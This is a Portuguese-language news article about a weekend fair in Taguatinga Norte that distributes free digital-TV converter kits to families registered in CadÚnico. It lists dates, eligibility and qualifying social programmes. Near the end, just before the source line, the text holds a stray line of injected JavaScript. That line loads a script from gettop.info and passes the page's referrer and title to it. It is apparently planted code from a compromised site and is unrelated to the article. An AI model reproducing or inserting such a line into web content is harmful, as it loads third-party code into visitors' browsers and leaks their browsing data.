Feira em Taguatinga distribui kits da TV digital neste fim de semana

 
 
Técnico instala antena de captação do sinal digital no Distrito Federal (Foto: TV Globo/Reprodução)
Técnico instala antena de captação do sinal digital no Distrito Federal (Foto: TV Globo/Reprodução)

 

Famílias do Distrito Federal que são beneficiadas pelos programas sociais do governo federal podem receber kits gratuitos para a captação do sinal de TV digital neste fim de semana. Os equipamentos serão distribuidos no Feirão Digital, em Taguatinga Norte, a partir das 9h deste sábado (5) e domingo (6).

Para ter direito ao kit, é preciso apresentar o número do Cadastro Único para Programas Sociais (CadÚnico) – aquela numeração que aparece no cartão do Bolsa Família ou no Cartão do Cidadão, por exemplo. A instalação também é gratuita, feita por técnicos que vão às residências em horário agendado.

Os kits são compostos por um conversor, uma antena e um controle remoto. Com esses itens, qualquer televisão pode ser adaptada e receber o sinal digital, que oferece imagem e som melhores que o sinal analógico. Nas próximas semanas, os canais analógicos serão desligados, e quem não fizer a adaptação pode ficar sem sinal de TV aberta.

Quem não puder comparecer ao evento deste fim de semana pode agendar a retirada do kit digital pelo telefone 147 ou pelo site Seja Digital. Os aparelhos de TV mais modernos, comprados a partir de 2010, possivelmente já estão adaptados à tecnologia digital – neste caso, é preciso instalar apenas a antena UHF.

No Feirão Digital, as famílias também podem tirar dúvidas sobre a transição. O evento acontece no Senai de Taguatinga Norte, na Área Especial 2.

O sinal digital é de graça e a qualidade, bem melhor. O som não tem ruídos e a imagem não tem chuviscos ou sombras. A Globo também criou um um site para tirar todas as dúvidas e ajudar os telespectadores a fazer a transição.

 

Feirão Digital em Taguatinga Norte
Data: sábado (5) e domingo (6)
Horário: a partir das 9h
Entrada gratuita, e kits gratuitos para inscritos no Cadastro Único

 

Confira a lista de programas sociais que dão direito à retirada do kit:

– Programa Bolsa Família

– Programa Minha Casa, Minha Vida

– Bolsa Verde – Programa de Apoio à Conservação Ambiental

– Programa de Erradicação do Trabalho Infantil – PETI

– Fomento – Programa de Fomento às Atividades Produtivas Rurais

– Carteira do Idoso

– Aposentadoria para pessoa de baixa renda

– Programa Brasil Carinhoso

– Programa de Cisternas

– Telefone Popular

– Carta Social

– Pro Jovem Adolescente

– Tarifa Social de Energia Elétrica

– Passe Livre para pessoas com deficiência

– Isenção de Taxas em Concursos Públicos

s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Fonte:

Deixe um comentário